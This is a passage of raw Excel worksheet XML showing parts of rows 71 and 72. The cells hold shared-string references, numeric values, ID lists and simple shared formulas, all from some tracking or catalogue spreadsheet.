        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="BP71" s="103">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BQ71" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR71" s="103">
        <f t="shared" si="118"/>
        <v>0</v>
      </c>
      <c r="BS71" s="103">
        <f t="shared" si="119"/>
        <v>0</v>
      </c>
      <c r="BT71" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU71" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV71" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW71" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX71" s="104">
        <v>0.0</v>
      </c>
      <c r="BY71" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ71" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA71" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB71" s="104">
        <v>0.0</v>
      </c>
      <c r="CC71" s="104">
        <v>0.0</v>
      </c>
      <c r="CD71" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE71" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF71" s="104" t="str">
        <f t="shared" si="121"/>
        <v>-</v>
      </c>
      <c r="CG71" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH71" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI71" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ71" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK71" s="104">
        <v>0.0</v>
      </c>
      <c r="CL71" s="104">
        <v>0.0</v>
      </c>
      <c r="CM71" s="105">
        <v>4.0</v>
      </c>
      <c r="CN71" s="105">
        <v>0.0</v>
      </c>
      <c r="CO71" s="105">
        <v>0.0</v>
      </c>
      <c r="CP71" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ71" s="105">
        <v>0.0</v>
      </c>
      <c r="CR71" s="105">
        <v>0.0</v>
      </c>
      <c r="CS71" s="105">
        <v>0.0</v>
      </c>
      <c r="CT71" s="105">
        <v>0.0</v>
      </c>
      <c r="CU71" s="105">
        <v>0.0</v>
      </c>
      <c r="CV71" s="105">
        <v>0.0</v>
      </c>
      <c r="CW71" s="105">
        <v>0.0</v>
      </c>
      <c r="CX71" s="105">
        <v>0.0</v>
      </c>
      <c r="CY71" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ71" s="105">
        <v>0.0</v>
      </c>
      <c r="DA71" s="105">
        <v>0.0</v>
      </c>
      <c r="DB71" s="106">
        <f t="shared" si="122"/>
        <v>0</v>
      </c>
      <c r="DC71" s="106">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DD71" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE71" s="106">
        <f t="shared" si="125"/>
        <v>0</v>
      </c>
      <c r="DF71" s="106">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="DG71" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH71" s="106">
        <f t="shared" si="127"/>
        <v>0</v>
      </c>
      <c r="DI71" s="106">
        <f t="shared" si="128"/>
        <v>0</v>
      </c>
      <c r="DJ71" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK71" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL71" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM71" s="108">
        <v>44604.0</v>
      </c>
      <c r="DN71" s="108">
        <v>1.0</v>
      </c>
      <c r="DO71" s="108">
        <v>3.0</v>
      </c>
      <c r="DP71" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ71" s="108">
        <v>44604.0</v>
      </c>
      <c r="DR71" s="108">
        <v>1.0</v>
      </c>
      <c r="DS71" s="108">
        <v>3.0</v>
      </c>
      <c r="DT71" s="108">
        <v>44604.0</v>
      </c>
      <c r="DU71" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV71" s="108">
        <f t="shared" si="150"/>
        <v>44604</v>
      </c>
      <c r="DW71" s="108">
        <v>44604.0</v>
      </c>
      <c r="DX71" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY71" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ71" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA71" s="108">
        <v>0.0</v>
      </c>
      <c r="EB71" s="108">
        <v>0.0</v>
      </c>
      <c r="EC71" s="109">
        <v>4.0</v>
      </c>
      <c r="ED71" s="109">
        <v>2.0</v>
      </c>
      <c r="EE71" s="109">
        <v>3.0</v>
      </c>
      <c r="EF71" s="109">
        <v>3.0</v>
      </c>
      <c r="EG71" s="109">
        <v>0.0</v>
      </c>
      <c r="EH71" s="109">
        <v>3.0</v>
      </c>
      <c r="EI71" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ71" s="109">
        <v>0.0</v>
      </c>
      <c r="EK71" s="109">
        <v>0.0</v>
      </c>
      <c r="EL71" s="109">
        <v>0.0</v>
      </c>
      <c r="EM71" s="109">
        <v>2.0</v>
      </c>
      <c r="EN71" s="109">
        <v>3.0</v>
      </c>
      <c r="EO71" s="109">
        <v>3.0</v>
      </c>
      <c r="EP71" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ71" s="109">
        <v>3.0</v>
      </c>
      <c r="ER71" s="110">
        <f t="shared" si="130"/>
        <v>2</v>
      </c>
      <c r="ES71" s="110">
        <f t="shared" si="131"/>
        <v>2</v>
      </c>
      <c r="ET71" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU71" s="110">
        <f t="shared" si="133"/>
        <v>3</v>
      </c>
      <c r="EV71" s="110">
        <f t="shared" si="134"/>
        <v>3</v>
      </c>
      <c r="EW71" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX71" s="110">
        <f t="shared" si="136"/>
        <v>3</v>
      </c>
      <c r="EY71" s="110">
        <f t="shared" si="137"/>
        <v>3</v>
      </c>
      <c r="EZ71" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA71" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB71" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC71" s="111" t="s">
        <v>1372</v>
      </c>
      <c r="FD71" s="111">
        <v>3.0</v>
      </c>
      <c r="FE71" s="111">
        <v>5.0</v>
      </c>
      <c r="FF71" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG71" s="111">
        <v>44604.0</v>
      </c>
      <c r="FH71" s="111">
        <v>1.0</v>
      </c>
      <c r="FI71" s="111">
        <v>3.0</v>
      </c>
      <c r="FJ71" s="111" t="s">
        <v>1372</v>
      </c>
      <c r="FK71" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FL71" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749, 44604</v>
      </c>
      <c r="FM71" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN71" s="111" t="s">
        <v>1372</v>
      </c>
      <c r="FO71" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP71" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ71" s="111">
        <v>0.0</v>
      </c>
      <c r="FR71" s="111">
        <v>0.0</v>
      </c>
      <c r="FS71" s="112">
        <v>4.0</v>
      </c>
      <c r="FT71" s="112">
        <v>2.0</v>
      </c>
      <c r="FU71" s="112">
        <v>4.0</v>
      </c>
      <c r="FV71" s="112">
        <v>3.0</v>
      </c>
      <c r="FW71" s="112">
        <v>2.0</v>
      </c>
      <c r="FX71" s="112">
        <v>5.0</v>
      </c>
      <c r="FY71" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ71" s="112">
        <v>0.0</v>
      </c>
      <c r="GA71" s="112">
        <v>0.0</v>
      </c>
      <c r="GB71" s="112">
        <v>0.0</v>
      </c>
      <c r="GC71" s="112">
        <v>2.0</v>
      </c>
      <c r="GD71" s="112">
        <v>3.0</v>
      </c>
      <c r="GE71" s="112">
        <v>3.0</v>
      </c>
      <c r="GF71" s="112">
        <v>0.0</v>
      </c>
      <c r="GG71" s="112">
        <v>3.0</v>
      </c>
      <c r="GH71" s="113">
        <f t="shared" si="139"/>
        <v>2</v>
      </c>
      <c r="GI71" s="113">
        <f t="shared" si="140"/>
        <v>2</v>
      </c>
      <c r="GJ71" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK71" s="113">
        <f t="shared" si="142"/>
        <v>4</v>
      </c>
      <c r="GL71" s="113">
        <f t="shared" si="143"/>
        <v>3</v>
      </c>
      <c r="GM71" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN71" s="113">
        <f t="shared" si="145"/>
        <v>5</v>
      </c>
      <c r="GO71" s="113">
        <f t="shared" si="146"/>
        <v>3</v>
      </c>
      <c r="GP71" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ71" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR71" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS71" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT71" s="94"/>
      <c r="GU71" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV71" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW71" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX71" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY71" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ71" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA71" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB71" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC71" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD71" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE71" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF71" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG71" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH71" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI71" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ71" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK71" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL71" s="93">
        <v>4.0</v>
      </c>
      <c r="HM71" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN71" s="93">
        <v>0.0</v>
      </c>
      <c r="HO71" s="93">
        <v>0.0</v>
      </c>
      <c r="HP71" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ71" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR71" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS71" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT71" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU71" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV71" s="119">
        <v>92322.0</v>
      </c>
      <c r="HW71" s="119">
        <v>1.0</v>
      </c>
      <c r="HX71" s="119">
        <v>1.0</v>
      </c>
      <c r="HY71" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ71" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA71" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB71" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC71" s="120">
        <f t="shared" ref="IC71:IC72" si="151">HV71</f>
        <v>92322</v>
      </c>
      <c r="ID71" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE71" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF71" s="120">
        <v>92322.0</v>
      </c>
      <c r="IG71" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH71" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II71" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ71" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK71" s="99">
        <v>7.0</v>
      </c>
      <c r="IL71" s="99">
        <v>0.0</v>
      </c>
      <c r="IM71" s="121">
        <f t="shared" si="97"/>
        <v>0</v>
      </c>
      <c r="IN71" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO71" s="98">
        <v>0.0</v>
      </c>
      <c r="IP71" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ71" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR71" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS71" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT71" s="127"/>
      <c r="IU71" s="127"/>
      <c r="IV71" s="127"/>
      <c r="IW71" s="127"/>
      <c r="IX71" s="127"/>
      <c r="IY71" s="127"/>
      <c r="IZ71" s="127"/>
      <c r="JA71" s="127"/>
      <c r="JB71" s="127"/>
      <c r="JC71" s="127"/>
      <c r="JD71" s="127"/>
      <c r="JE71" s="127"/>
      <c r="JF71" s="127"/>
      <c r="JG71" s="127"/>
      <c r="JH71" s="127"/>
      <c r="JI71" s="127"/>
      <c r="JJ71" s="127"/>
      <c r="JK71" s="127"/>
      <c r="JL71" s="127"/>
      <c r="JM71" s="127"/>
      <c r="JN71" s="127"/>
      <c r="JO71" s="127"/>
      <c r="JP71" s="127"/>
      <c r="JQ71" s="127"/>
      <c r="JR71" s="127"/>
      <c r="JS71" s="127"/>
      <c r="JT71" s="127"/>
      <c r="JU71" s="127"/>
      <c r="JV71" s="127"/>
      <c r="JW71" s="127"/>
      <c r="JX71" s="127"/>
      <c r="JY71" s="127"/>
      <c r="JZ71" s="127"/>
      <c r="KA71" s="127"/>
      <c r="KB71" s="127"/>
      <c r="KC71" s="127"/>
      <c r="KD71" s="127"/>
      <c r="KE71" s="127"/>
      <c r="KF71" s="127"/>
      <c r="KG71" s="127"/>
      <c r="KH71" s="127"/>
      <c r="KI71" s="127"/>
      <c r="KJ71" s="127"/>
      <c r="KK71" s="127"/>
      <c r="KL71" s="127"/>
      <c r="KM71" s="127"/>
      <c r="KN71" s="127"/>
      <c r="KO71" s="127"/>
      <c r="KP71" s="127"/>
      <c r="KQ71" s="127"/>
      <c r="KR71" s="127"/>
      <c r="KS71" s="127"/>
      <c r="KT71" s="127"/>
      <c r="KU71" s="127"/>
      <c r="KV71" s="127"/>
      <c r="KW71" s="127"/>
      <c r="KX71" s="127"/>
      <c r="KY71" s="127"/>
      <c r="KZ71" s="127"/>
      <c r="LA71" s="127"/>
      <c r="LB71" s="127"/>
      <c r="LC71" s="127"/>
      <c r="LD71" s="127"/>
      <c r="LE71" s="127"/>
      <c r="LF71" s="127"/>
      <c r="LG71" s="127"/>
      <c r="LH71" s="127"/>
      <c r="LI71" s="127"/>
      <c r="LJ71" s="127"/>
      <c r="LK71" s="127"/>
      <c r="LL71" s="127"/>
      <c r="LM71" s="127"/>
      <c r="LN71" s="127"/>
      <c r="LO71" s="127"/>
      <c r="LP71" s="127"/>
      <c r="LQ71" s="127"/>
      <c r="LR71" s="127"/>
      <c r="LS71" s="127"/>
      <c r="LT71" s="127"/>
      <c r="LU71" s="127"/>
      <c r="LV71" s="127"/>
      <c r="LW71" s="127"/>
      <c r="LX71" s="127"/>
      <c r="LY71" s="127"/>
      <c r="LZ71" s="127"/>
      <c r="MA71" s="127"/>
      <c r="MB71" s="127"/>
      <c r="MC71" s="127"/>
      <c r="MD71" s="127"/>
      <c r="ME71" s="127"/>
      <c r="MF71" s="127"/>
      <c r="MG71" s="127"/>
      <c r="MH71" s="127"/>
      <c r="MI71" s="127"/>
      <c r="MJ71" s="127"/>
      <c r="MK71" s="127"/>
      <c r="ML71" s="127"/>
      <c r="MM71" s="127"/>
      <c r="MN71" s="127"/>
      <c r="MO71" s="127"/>
      <c r="MP71" s="127"/>
      <c r="MQ71" s="127"/>
      <c r="MR71" s="127"/>
      <c r="MS71" s="127"/>
      <c r="MT71" s="127"/>
      <c r="MU71" s="127"/>
      <c r="MV71" s="127"/>
      <c r="MW71" s="127"/>
      <c r="MX71" s="127"/>
      <c r="MY71" s="127"/>
      <c r="MZ71" s="127"/>
      <c r="NA71" s="127"/>
      <c r="NB71" s="127"/>
      <c r="NC71" s="127"/>
      <c r="ND71" s="127"/>
      <c r="NE71" s="127"/>
      <c r="NF71" s="127"/>
      <c r="NG71" s="127"/>
      <c r="NH71" s="127"/>
      <c r="NI71" s="127"/>
      <c r="NJ71" s="127"/>
      <c r="NK71" s="127"/>
      <c r="NL71" s="127"/>
      <c r="NM71" s="127"/>
      <c r="NN71" s="127"/>
      <c r="NO71" s="127"/>
      <c r="NP71" s="127"/>
      <c r="NQ71" s="127"/>
      <c r="NR71" s="127"/>
      <c r="NS71" s="127"/>
      <c r="NT71" s="127"/>
      <c r="NU71" s="127"/>
      <c r="NV71" s="127"/>
      <c r="NW71" s="127"/>
      <c r="NX71" s="127"/>
      <c r="NY71" s="127"/>
    </row>
    <row r="72" ht="153.75" customHeight="1">
      <c r="B72" s="89" t="s">
        <v>1373</v>
      </c>
      <c r="C72" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D72" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E72" s="90" t="s">
        <v>1374</v>
      </c>
      <c r="F72" s="90" t="s">
        <v>1375</v>
      </c>
      <c r="G72" s="91" t="s">
        <v>1376</v>
      </c>
      <c r="H72" s="90" t="s">
        <v>1377</v>
      </c>
      <c r="I72" s="92" t="s">
        <v>1378</v>
      </c>
      <c r="J72" s="92" t="s">
        <v>917</v>
      </c>
      <c r="K72" s="92" t="s">
        <v>1379</v>
      </c>
      <c r="L72" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M72" s="93">
        <v>12.0</v>
      </c>
      <c r="N72" s="93">
        <v>1.0</v>
      </c>
      <c r="O72" s="93">
        <v>1.0</v>
      </c>
      <c r="P72" s="93">
        <v>1.0</v>
      </c>
      <c r="Q72" s="93">
        <f t="shared" si="103"/>
        <v>2</v>
      </c>
      <c r="R72" s="93">
        <v>1.0</v>
      </c>
      <c r="S72" s="93">
        <v>1.0</v>
      </c>
      <c r="T72" s="94" t="s">
        <v>565</v>
      </c>
      <c r="U72" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V72" s="96" t="s">
        <v>1380</v>
      </c>
      <c r="W72" s="138" t="s">
        <v>1378</v>
      </c>
      <c r="X72" s="126" t="s">
        <v>1381</v>
      </c>
      <c r="Y72" s="126" t="s">
        <v>1382</v>
      </c>
      <c r="Z72" s="132" t="s">
        <v>1383</v>
      </c>
      <c r="AA72" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB72" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC72" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD72" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE72" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF72" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG72" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH72" s="99" t="s">
        <v>1384</v>
      </c>
      <c r="AI72" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ72" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK72" s="100">
        <v>1917.0</v>
      </c>
      <c r="AL72" s="100">
        <v>1.0</v>
      </c>
      <c r="AM72" s="100">
        <v>12.0</v>
      </c>
      <c r="AN72" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO72" s="100">
        <v>1917.0</v>
      </c>
      <c r="AP72" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ72" s="100">
        <v>12.0</v>
      </c>
      <c r="AR72" s="100">
        <v>1917.0</v>
      </c>
      <c r="AS72" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT72" s="100">
        <f t="shared" si="149"/>
        <v>1917</v>
      </c>
      <c r="AU72" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV72" s="100">
        <v>1917.0</v>
      </c>
      <c r="AW72" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX72" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY72" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ72" s="100">
        <v>0.0</v>
      </c>
      <c r="BA72" s="102">
        <v>12.0</v>
      </c>
      <c r="BB72" s="102">
        <v>3.0</v>
      </c>
      <c r="BC72" s="102">
        <v>12.0</v>
      </c>
      <c r="BD72" s="102">
        <v>12.0</v>
      </c>
      <c r="BE72" s="102">
        <v>0.0</v>
      </c>
      <c r="BF72" s="102">
        <v>0.0</v>
      </c>
      <c r="BG72" s="102">
        <v>0.0</v>
      </c>
      <c r="BH72" s="102">
        <v>0.0</v>
      </c>
      <c r="BI72" s="102">
        <v>3.0</v>
      </c>
      <c r="BJ72" s="102">
        <v>12.0</v>
      </c>
      <c r="BK72" s="102">
        <v>12.0</v>
      </c>
      <c r="BL72" s="103">
        <f t="shared" si="112"/>
        <v>3</v>
      </c>
      <c r="BM72" s="103">
        <f t="shared" si="113"/>
        <v>3</v>
      </c>
      <c r="BN72" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO72" s="103">
        <f t="shared" si="115"/>
        <v>12</v>
      </c>
      <c r="BP72" s="103">
        <f t="shared" si="116"/>
        <v>12</v>
      </c>
      <c r="BQ72" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR72" s="103">
        <f t="shared" si="118"/>
        <v>12</v>
      </c>
      <c r="BS72" s="103">
        <f t="shared" si="119"/>
        <v>12</v>
      </c>
      <c r="BT72" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU72" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV72" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW72" s="104" t="s">
        <v>1385</v>
      </c>
      <c r="BX72" s="104">
        <v>3.0</v>
      </c>
      <c r="BY72" s="104">
        <v>14.0</v>
      </c>
      <c r="BZ72" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA72" s="104" t="s">
        <v>1386</v>
      </c>
      <c r="CB72" s="104">
        <v>3.0</v>
      </c>
      <c r="CC72" s="104">
        <v>14.0</v>
      </c>
      <c r="CD72" s="104" t="s">
        <v>1387</v>
      </c>
      <c r="CE72" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF72" s="104" t="str">
        <f t="shared" si="121"/>
        <v>1917, 2035480</v>
      </c>
      <c r="CG72" s="104">
        <v>2035480.0</v>
      </c>
      <c r="CH72" s="104">
        <v>1917.0</v>
      </c>
      <c r="CI72" s="158">
        <v>2025644.0</v>
      </c>
      <c r="CJ72" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK72" s="104">
        <v>1.0</v>
      </c>
      <c r="CL72" s="104">
        <v>1.0</v>
      </c>
      <c r="CM72" s="105">
        <v>12.0</v>
      </c>
      <c r="CN72" s="105">
        <v>3.0</v>
      </c>
      <c r="CO72" s="105">
        <v>14.0</v>
      </c>
      <c r="CP72" s="105">
        <v>12.0</v>
      </c>
      <c r="CQ72" s="105">
        <v>2.0</v>
      </c>
      <c r="CR72" s="105">
        <v>14.0</v>
      </c>
      <c r="CS72" s="105">
        <v>0.0</v>
      </c>
      <c r="CT72" s="105">
        <v>1.0</v>
      </c>
      <c r="CU72" s="105">
        <v>0.0</v>
      </c>
      <c r="CV72" s="105">
        <v>0.0</v>
      </c>
      <c r="CW72" s="105">
        <v>3.0</v>
      </c>
      <c r="CX72" s="105">
        <v>14.0</v>
      </c>
      <c r="CY72" s="105">
        <v>12.0</v>
      </c>
      <c r="CZ72" s="105">
        <v>2.0</v>
      </c>
      <c r="DA72" s="105">
        <v>14.0</v>
      </c>
      <c r="DB72" s="106">
        <f t="shared" si="122"/>
        <v>3</v>
      </c>
      <c r="DC72" s="106">
        <f t="shared" si="123"/>
        <v>3</v>
      </c>
      <c r="DD72" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE72" s="106">
        <f t="shared" si="125"/>
        <v>14</v>
      </c>
      <c r="DF72" s="106">
        <f t="shared" si="126"/>
        <v>14</v>
      </c>
      <c r="DG72" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH72" s="106">
        <f t="shared" si="127"/>
        <v>14</v>
      </c>
      <c r="DI72" s="106">
        <f t="shared" si="128"/>
        <v>14</v>
      </c>
      <c r="DJ72" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK72" s="107">
        <f t="shared" si="104"/>
        <v>0.5</v>
      </c>
      <c r="DL72" s="106">
        <f t="shared" si="105"/>
        <v>1</v>
      </c>
      <c r="DM72" s="108" t="s">
        <v>1388</v>
      </c>
      <c r="DN72" s="108">
        <v>3.0</v>
      </c>
      <c r="DO72" s="108">
        <v>14.0</v>
      </c>
      <c r="DP72" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ72" s="108" t="s">
        <v>1386</v>
      </c>
      <c r="DR72" s="108">
        <v>3.0</v>
      </c>
      <c r="DS72" s="108">
        <v>14.0</v>
      </c>
      <c r="DT72" s="108" t="s">
        <v>1387</v>
      </c>
      <c r="DU72" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV72" s="108" t="str">
        <f t="shared" si="150"/>
        <v>1917, 2035480</v>
      </c>
      <c r="DW72" s="108">
        <v>2035480.0</v>
      </c>
      <c r="DX72" s="108">
        <v>1917.0</v>
      </c>
      <c r="DY72" s="159">
        <v>2025644.0</v>
      </c>
      <c r="DZ72" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA72" s="108">
        <v>1.0</v>
      </c>
      <c r="EB72" s="108">
        <v>1.0</v>
      </c>
      <c r="EC72" s="109">
        <v>12.0</v>
      </c>
      <c r="ED72" s="109">
        <v>3.0</v>
      </c>
      <c r="EE72" s="109">
        <v>14.0</v>
      </c>
      <c r="EF72" s="109">
        <v>12.0</v>
      </c>
      <c r="EG72" s="109">
        <v>2.0</v>
      </c>
      <c r="EH72" s="109">
        <v>14.0</v>
      </c>
      <c r="EI72" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ72" s="109">
        <v>1.0</v>
      </c>
      <c r="EK72" s="109">
        <v>0.0</v>
      </c>
      <c r="EL72" s="109">
        <v>0.0</v>
      </c>
      <c r="EM72" s="109">
        <v>3.0</v>
      </c>
      <c r="EN72" s="109">
        <v>14.0</v>
      </c>
      <c r="EO72" s="109">
        <v>12.0</v>
      </c>
      <c r="EP72" s="109">
        <v>2.0</v>
      </c>
      <c r="EQ72" s="109">
        <v>14.0</v>
      </c>
      <c r="ER72" s="110">
        <f t="shared" si="130"/>
        <v>3</v>
      </c>
      <c r="ES72" s="110">
        <f t="shared" si="131"/>
        <v>3</v>
      </c>
      <c r="ET72" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU72" s="110">
        <f t="shared" si="133"/>
        <v>14</v>
      </c>
      <c r="EV72" s="110">
        <f t="shared" si="134"/>
        <v>14</v>
      </c>
      <c r="EW72" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX72" s="110">
        <f t="shared" si="136"/>
        <v>14</v>
      </c>
      <c r="EY72" s="110">
        <f t="shared" si="137"/>
        <v>14</v>
      </c>
      <c r="EZ72" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA72" s="110">
        <f t="shared" si="106"/>
        <v>0.5</v>
      </c>
      <c r="FB72" s="110">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="FC72" s="111" t="s">
        <v>1389</v>
      </c>
      <c r="FD72" s="111">
        <v>7.0</v>
      </c>
      <c r="FE72" s="111">
        <v>31.0</v>
      </c>
      <c r="FF72" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG72" s="111" t="s">
        <v>1390</v>
      </c>
      <c r="FH72" s="111">
        <v>5.0</v>
      </c>
      <c r="FI72" s="111">
        <v>15.0</v>
      </c>
      <c r="FJ72" s="111" t="s">
        <v>1391</v>
      </c>
      <c r="FK72" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL72" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749, 2035480, 2000419, 2101917, 1917</v>
      </c>
      <c r="FM72" s="111" t="s">
        <v>1392</v>
      </c>
      <c r="FN72" s="111" t="s">
        <v>1393</v>
      </c>
      <c r="FO72" s="111">
        <v>2025644.0</v>
      </c>
      <c r="FP72" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ72" s="111">
        <v>1.0</v>
      </c>
      <c r="FR72" s="111">
        <v>1.0</v>
      </c>
      <c r="FS72" s="112">
        <v>12.0</v>
      </c>
      <c r="FT72" s="112">
        <v>4.0</v>
      </c>
      <c r="FU72" s="112">
        <v>16.0</v>
      </c>
      <c r="FV72" s="112">
        <v>12.0</v>
      </c>
      <c r="FW72" s="112">
        <v>19.0</v>
      </c>
      <c r="FX72" s="112">
        <v>31.0</v>
      </c>
      <c r="FY72" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ72" s="112">
        <v>0.0</v>
      </c>
      <c r="GA72" s="112">
        <v>0.0</v>
      </c>
      <c r="GB72" s="112">
        <v>0.0</v>
      </c>
      <c r="GC72" s="112">
        <v>4.0</v>
      </c>
      <c r="GD72" s="112">
        <v>14.0</v>
      </c>
      <c r="GE72" s="112">
        <v>12.0</v>
      </c>
      <c r="GF72" s="112">
